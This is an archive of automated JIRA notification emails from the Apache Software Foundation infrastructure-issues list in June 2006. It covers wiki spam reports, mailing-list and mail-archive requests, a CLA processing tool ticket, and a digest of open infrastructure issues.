asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 05:07:04 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 05:07:03 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C1DBF7141F3 for <[email protected]>; Tue, 27 Jun 2006 12:05:29 +0000 (GMT) Message-ID: <16991883.1151409929775.JavaMail.jira@brutus> Date: Tue, 27 Jun 2006 12:05:29 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-862) new wiki spam account 'CdcDdcd' MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N new wiki spam account 'CdcDdcd' ------------------------------- Key: INFRA-862 URL: http://issues.apache.org/jira/browse/INFRA-862 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Wiki Environment: wiki Reporter: Jesse Kuhnert A new wiki spammer is active again, username 'CdcDdcd'. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 27 15:54:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23860 invoked from network); 27 Jun 2006 15:54:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Jun 2006 15:54:13 -0000 Received: (qmail 19716 invoked by uid 500); 27 Jun 2006 15:54:06 -0000 Delivered-To: [email protected] Received: (qmail 19433 invoked by uid 500); 27 Jun 2006 15:54:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19417 invoked by uid 99); 27 Jun 2006 15:54:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 08:54:04 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 08:54:04 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 187717141E3 for <[email protected]>; Tue, 27 Jun 2006 15:52:30 +0000 (GMT) Message-ID: <15648910.1151423550070.JavaMail.jira@brutus> Date: Tue, 27 Jun 2006 15:52:30 +0000 (GMT+00:00) From: "Sander Striker (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-863) Make private mail archives accessible to members through https MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Make private mail archives accessible to members through https -------------------------------------------------------------- Key: INFRA-863 URL: http://issues.apache.org/jira/browse/INFRA-863 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mail Archives Reporter: Sander Striker Make private mail archives accessible through https for members. http://mail-archives.apache.org/mod_mbox/, but then for the private lists. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 01:34:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6013 invoked from network); 28 Jun 2006 01:34:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 01:34:11 -0000 Received: (qmail 57182 invoked by uid 500); 28 Jun 2006 01:34:08 -0000 Delivered-To: [email protected] Received: (qmail 56838 invoked by uid 500); 28 Jun 2006 01:34:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56825 invoked by uid 99); 28 Jun 2006 01:34:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 18:34:06 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 27 Jun 2006 18:34:05 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 689D47141F3 for <[email protected]>; Wed, 28 Jun 2006 01:32:30 +0000 (GMT) Message-ID: <21607959.1151458350404.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 01:32:30 +0000 (GMT+00:00) From: [email protected] To: [email protected] Subject: [jira] Subscription: Open INFRA issues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Issue Subscription Filter: Open INFRA issues (77 issues) Subscriber: [email protected] Key Summary INFRA-863 Make private mail archives accessible to members through https http://issues.apache.org/jira/browse/INFRA-863 INFRA-862 new wiki spam account 'CdcDdcd' http://issues.apache.org/jira/browse/INFRA-862 INFRA-861 Please add [Tags] to OFBiz mailing lists http://issues.apache.org/jira/browse/INFRA-861 INFRA-860 XML errors in archived posts http://issues.apache.org/jira/browse/INFRA-860 INFRA-859 Notify Bugzilla users when a project has moved to JIRA http://issues.apache.org/jira/browse/INFRA-859 INFRA-855 mirror information change for apache.alkar.net http://issues.apache.org/jira/browse/INFRA-855 INFRA-854 New PL Mirror http://issues.apache.org/jira/browse/INFRA-854 INFRA-853 Setup ADF Faces in continuum http://issues.apache.org/jira/browse/INFRA-853 INFRA-851 Struts project - Create Confluence Instance http://issues.apache.org/jira/browse/INFRA-851 INFRA-849 New Armenian mirror http://issues.apache.org/jira/browse/INFRA-849 INFRA-848 Create new Jira Project for Incubator Preoject Abdera http://issues.apache.org/jira/browse/INFRA-848 INFRA-847 Fan failure in helios http://issues.apache.org/jira/browse/INFRA-847 INFRA-846 http mirror fixed http://issues.apache.org/jira/browse/INFRA-846 INFRA-841 Maven repositories not being synchronized? http://issues.apache.org/jira/browse/INFRA-841 INFRA-838 Restore Apache mirror http://issues.apache.org/jira/browse/INFRA-838 INFRA-836 new wiki request: lucy http://issues.apache.org/jira/browse/INFRA-836 INFRA-834 Please add new mirror in Germany, Hannover http://issues.apache.org/jira/browse/INFRA-834 INFRA-831 New NL mirror http://issues.apache.org/jira/browse/INFRA-831 INFRA-828 New / Renewed Mirror in USA http://issues.apache.org/jira/browse/INFRA-828 INFRA-827 New mirror - please add http://issues.apache.org/jira/browse/INFRA-827 INFRA-826 Mail archives out of sync http://issues.apache.org/jira/browse/INFRA-826 INFRA-825 Issue visibility not enabled in the form associated to the issue creation. http://issues.apache.org/jira/browse/INFRA-825 INFRA-824 Internal error when creating Tomcat 6 issue. http://issues.apache.org/jira/browse/INFRA-824 INFRA-823 Create HiveMind TLP http://issues.apache.org/jira/browse/INFRA-823 INFRA-821 Disable weekly Bugzilla reports for Jakarta Commons http://issues.apache.org/jira/browse/INFRA-821 INFRA-820 new http mirror for apache.org with german location http://issues.apache.org/jira/browse/INFRA-820 INFRA-819 New Mirror http://issues.apache.org/jira/browse/INFRA-819 INFRA-815 SPF Records for incubator.apache.org are wrong. http://issues.apache.org/jira/browse/INFRA-815 INFRA-813 Import Jira projects into the main Jira http://issues.apache.org/jira/browse/INFRA-813 INFRA-808 Install request: apr v1.2.7 Solaris PKG within the zones http://issues.apache.org/jira/browse/INFRA-808 INFRA-797 Create new mailing lists for HiveMind http://issues.apache.org/jira/browse/INFRA-797 INFRA-796 Move HiveMind wiki from Jakarta to top-level http://issues.apache.org/jira/browse/INFRA-796 INFRA-782 Need to switch nameservers for apachecon.com urgently http://issues.apache.org/jira/browse/INFRA-782 INFRA-777 Use wrapper to automatically restart Java services http://issues.apache.org/jira/browse/INFRA-777 INFRA-768 Missing HTML escaping in ViewCVS' svn diffs http://issues.apache.org/jira/browse/INFRA-768 INFRA-761 Import Torque issues into JIRA http://issues.apache.org/jira/browse/INFRA-761 INFRA-726 Remove old Lucene @jakarta.apache.org lists http://issues.apache.org/jira/browse/INFRA-726 INFRA-710 Nameserver entries for myfaces.org http://issues.apache.org/jira/browse/INFRA-710 INFRA-708 Rename/move of mailing list breaks archive URIs http://issues.apache.org/jira/browse/INFRA-708 INFRA-705 create [email protected] to supercede [email protected] http://issues.apache.org/jira/browse/INFRA-705 INFRA-698 Monitoring lenya.zones server http://issues.apache.org/jira/browse/INFRA-698 INFRA-690 Please create new Wiki for the Public Relations Committee (PRC) at wiki.apache.org/Talks http://issues.apache.org/jira/browse/INFRA-690 INFRA-624 svn --revprop svn:log changes not reflected in Jira issues http://issues.apache.org/jira/browse/INFRA-624 INFRA-608 Document Xserve installations http://issues.apache.org/jira/browse/INFRA-608 INFRA-607 Harden Xserve installations http://issues.apache.org/jira/browse/INFRA-607 INFRA-602 Configure Xserves as mail spool servers http://issues.apache.org/jira/browse/INFRA-602 INFRA-589 Replicate SpamAssassin Bugzilla e-mail comment setup on Ajax http://issues.apache.org/jira/browse/INFRA-589 INFRA-568 Account creation process should take care of apcvs ownership http://issues.apache.org/jira/browse/INFRA-568 INFRA-559 JIRA (and Bugzilla?) can't handle non-latin characters http://issues.apache.org/jira/browse/INFRA-559 INFRA-558 please close the scarab tracker for Turbine 2 http://issues.apache.org/jira/browse/INFRA-558 INFRA-537 A few updates for the XML Graphics project http://issues.apache.org/jira/browse/INFRA-537 INFRA-443 setup xmlbeans-cxx subversion for incubator http://issues.apache.org/jira/browse/INFRA-443 INFRA-424 Install OpenSSL into /opt on the zones http://issues.apache.org/jira/browse/INFRA-424 INFRA-412 Implement proper mail-to-jira bridge http://issues.apache.org/jira/browse/INFRA-412 INFRA-407 Links on Saved searches Preferences tab are missing http://issues.apache.org/jira/browse/INFRA-407 INFRA-398 Turn off eyebrowse? http://issues.apache.org/jira/browse/INFRA-398 INFRA-397 Create a simple commandline tool for searching private e-mail archives http://issues.apache.org/jira/browse/INFRA-397 INFRA-391 Create a web application for creating and editing ~/.forward files http://issues.apache.org/jira/browse/INFRA-391 INFRA-371 point myfaces.org to myfaces.apache.org http://issues.apache.org/jira/browse/INFRA-371 INFRA-352 Tweak the message body for jira notifications http://issues.apache.org/jira/browse/INFRA-352 INFRA-348 Make account-mailer provide host information http://issues.apache.org/jira/browse/INFRA-348 INFRA-347 Install svn:infrastructure/trunk/tools on all our machines http://issues.apache.org/jira/browse/INFRA-347 INFRA-346 Seriously clean up the infrastructure website documentation http://issues.apache.org/jira/browse/INFRA-346 INFRA-345 Write a script to detect unused accounts http://issues.apache.org/jira/browse/INFRA-345 INFRA-343 Write a script to remove svn auth credentials from the user accounts on our servers http://issues.apache.org/jira/browse/INFRA-343 INFRA-342 Develop a CLA processing tool http://issues.apache.org/jira/browse/INFRA-342 INFRA-341 Standardised form for requesting standard resources http://issues.apache.org/jira/browse/INFRA-341 INFRA-338 Create an automated way to keep crontabs synced with SVN http://issues.apache.org/jira/browse/INFRA-338 INFRA-334 Document service checklist as part of www.apache.org/dev/ http://issues.apache.org/jira/browse/INFRA-334 INFRA-330 Jira periodic issue summaries should include assignees http://issues.apache.org/jira/browse/INFRA-330 INFRA-315 SRS patch should be applied when available (SPF fail with mailinglists broken) http://issues.apache.org/jira/browse/INFRA-315 INFRA-261 Wiki change notifications need to look like they did before http://issues.apache.org/jira/browse/INFRA-261 INFRA-250 Enable e-mail comments for Bugzilla http://issues.apache.org/jira/browse/INFRA-250 INFRA-235 RFE: magic "revision" keyword in bugzilla comments http://issues.apache.org/jira/browse/INFRA-235 INFRA-227 Enable email tracking for Bugzilla http://issues.apache.org/jira/browse/INFRA-227 INFRA-222 anti-virus filtering overzealous for one specific list http://issues.apache.org/jira/browse/INFRA-222 INFRA-210 svnmailer breaks utility of diffs contained in SVN patches http://issues.apache.org/jira/browse/INFRA-210 From [email protected] Wed Jun 28 14:30:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63953 invoked from network); 28 Jun 2006 14:30:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 14:30:09 -0000 Received: (qmail 59196 invoked by uid 500); 28 Jun 2006 14:30:07 -0000 Delivered-To: [email protected] Received: (qmail 58967 invoked by uid 500); 28 Jun 2006 14:30:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58956 invoked by uid 99); 28 Jun 2006 14:30:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 07:30:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 07:30:05 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D2F01410005 for <[email protected]>; Wed, 28 Jun 2006 14:28:29 +0000 (GMT) Message-ID: <5399586.1151504909861.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 14:28:29 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-864) create repository-commits list, same setup as [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N create repository-commits list, same setup as [email protected] ------------------------------------------------------------------- Key: INFRA-864 URL: http://issues.apache.org/jira/browse/INFRA-864 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Brett Porter Assigned to: Brett Porter there are a bunch of notifications now going to this list for monitoring purposes. Some people have expressed a desire to monitor the discussion without the frequent spam -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 14:47:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73375 invoked from network); 28 Jun 2006 14:47:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 14:47:09 -0000 Received: (qmail 5154 invoked by uid 500); 28 Jun 2006 14:47:08 -0000 Delivered-To: [email protected] Received: (qmail 4901 invoked by uid 500); 28 Jun 2006 14:47:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4890 invoked by uid 99); 28 Jun 2006 14:47:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 07:47:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 07:47:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B23EB410005 for <[email protected]>; Wed, 28 Jun 2006 14:45:30 +0000 (GMT) Message-ID: <22920353.1151505930727.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 14:45:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-864) create repository-commits list, same setup as [email protected] In-Reply-To: <5399586.1151504909861.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-864?page=all ] Brett Porter closed INFRA-864: ------------------------------ Resolution: Fixed > create repository-commits list, same setup as [email protected] > ------------------------------------------------------------------- > > Key: INFRA-864 > URL: http://issues.apache.org/jira/browse/INFRA-864 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Brett Porter > Assignee: Brett Porter > > there are a bunch of notifications now going to this list for monitoring purposes. Some people have expressed a desire to monitor the discussion without the frequent spam -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 16:01:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8342 invoked from network); 28 Jun 2006 16:01:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 16:01:10 -0000 Received: (qmail 5442 invoked by uid 500); 28 Jun 2006 16:01:07 -0000 Delivered-To: [email protected] Received: (qmail 5161 invoked by uid 500); 28 Jun 2006 16:01:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5150 invoked by uid 99); 28 Jun 2006 16:01:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:01:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:01:05 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C26B77141E0 for <[email protected]>; Wed, 28 Jun 2006 15:59:29 +0000 (GMT) Message-ID: <26775964.1151510369766.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 15:59:29 +0000 (GMT+00:00) From: "Davanum Srinivas (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-865) Template to request promoting a project to a new TLP MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Template to request promoting a project to a new TLP ---------------------------------------------------- Key: INFRA-865 URL: http://issues.apache.org/jira/browse/INFRA-865 Project: Infrastructure Type: Wish Security: public (Regular issues) Reporter: Davanum Srinivas We need a good template for people to send a request for a TLP promotion. And associated scripts at the back to help automate the tasks. (like the account creation scripts). -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 16:06:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11559 invoked from network); 28 Jun 2006 16:06:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 16:06:10 -0000 Received: (qmail 15488 invoked by uid 500); 28 Jun 2006 16:06:08 -0000 Delivered-To: [email protected] Received: (qmail 15249 invoked by uid 500); 28 Jun 2006 16:06:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15238 invoked by uid 99); 28 Jun 2006 16:06:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:06:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:06:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 74BA97141E0 for <[email protected]>; Wed, 28 Jun 2006 16:04:31 +0000 (GMT) Message-ID: <3989981.1151510671442.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 16:04:31 +0000 (GMT+00:00) From: "Davanum Srinivas (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-342) [WORKFLOW] Develop a CLA processing tool MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-342?page=all ] Davanum Srinivas updated INFRA-342: ----------------------------------- Summary: [WORKFLOW] Develop a CLA processing tool (was: Develop a CLA processing tool) > [WORKFLOW] Develop a CLA processing tool > ---------------------------------------- > > Key: INFRA-342 > URL: http://issues.apache.org/jira/browse/INFRA-342 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: InfraTools > Reporter: Leo Simons > > Some python code is in development at > https://svn.apache.org/repos/asf/infrastructure/trunk/tools/clatool/ > (primarily by gstein atm) that aims to implement the workflow process described at > https://svn.apache.org/repos/asf/infrastructure/trunk/tools/clatool/cla-handling-requirements.txt > that code needs to be finished. Previously, a message was sent out to the committers mailing list stating > --- > Hello all... > Attached to this message is a text file describing a relatively simple > webapp needed by the infrastructure team, and I'm hoping one of you would > be willing to step up to the plate and build it for us. Basically the > deal is that the process by which we handle the acknowledgement of receipt > of CLA's for new committers is very tedious, and since a record of the CLA > is a requirement for a new account to be created, this often means that > the account creation process gets drawn out over a much longer period of > time than necessary. We think this could be easily fixed if we just had a > simple program to track the CLA's for us. > Take your pick of language/environment... we don't really care what > it's written in as long as it meets the requirements specified in the file > and it will run on www.apache.org (we might be willing to install > additional software on the webserver to make that happen... like if you > want to write it in php, we can install php, etc... that part is > negotiable). > (...) > --- -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 16:06:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12250 invoked from network); 28 Jun 2006 16:06:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 16:06:16 -0000 Received: (qmail 15997 invoked by uid 500); 28 Jun 2006 16:06:14 -0000 Delivered-To: [email protected] Received: (qmail 15702 invoked by uid 500); 28 Jun 2006 16:06:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15562 invoked by uid 99); 28 Jun 2006 16:06:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:06:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:06:08 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A9CFB410006 for <[email protected]>; Wed, 28 Jun 2006 16:04:32 +0000 (GMT) Message-ID: <1353929.1151510672692.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 16:04:32 +0000 (GMT+00:00) From: "Davanum Srinivas (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-865) [WORKFLOW] Template to request promoting a project to a new TLP In-Reply-To: <26775964.1151510369766.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-865?page=all ] Davanum Srinivas updated INFRA-865: ----------------------------------- Summary: [WORKFLOW] Template to request promoting a project to a new TLP (was: Template to request promoting a project to a new TLP) > [WORKFLOW] Template to request promoting a project to a new TLP > --------------------------------------------------------------- > > Key: INFRA-865 > URL: http://issues.apache.org/jira/browse/INFRA-865 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Reporter: Davanum Srinivas > > We need a good template for people to send a request for a TLP promotion. And associated scripts at the back to help automate the tasks. (like the account creation scripts). -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 16:08:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14297 invoked from network); 28 Jun 2006 16:08:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 16:08:13 -0000 Received: (qmail 21841 invoked by uid 500); 28 Jun 2006 16:08:07 -0000 Delivered-To: [email protected] Received: (qmail 21544 invoked by uid 500); 28 Jun 2006 16:08:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21533 invoked by uid 99); 28 Jun 2006 16:08:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:08:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 09:08:05 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 29ABF7141E0 for <[email protected]>; Wed, 28 Jun 2006 16:06:30 +0000 (GMT) Message-ID: <18361962.1151510790152.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 16:06:30 +0000 (GMT+00:00) From: "Davanum Srinivas (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-865) [WORKFLOW] Template to request promoting a project to a new TLP In-Reply-To: <26775964.1151510369766.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-865?page=all ] Davanum Srinivas updated INFRA-865: ----------------------------------- Component: InfraTools > [WORKFLOW] Template to request promoting a project to a new TLP > --------------------------------------------------------------- > > Key: INFRA-865 > URL: http://issues.apache.org/jira/browse/INFRA-865 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: InfraTools > Reporter: Davanum Srinivas > > We need a good template for people to send a request for a TLP promotion. And associated scripts at the back to help automate the tasks. (like the account creation scripts). -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 17:53:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62893 invoked from network); 28 Jun 2006 17:53:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 17:53:13 -0000 Received: (qmail 19664 invoked by uid 500); 28 Jun 2006 17:53:08 -0000 Delivered-To: [email protected] Received: (qmail 19381 invoked by uid 500); 28 Jun 2006 17:53:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] 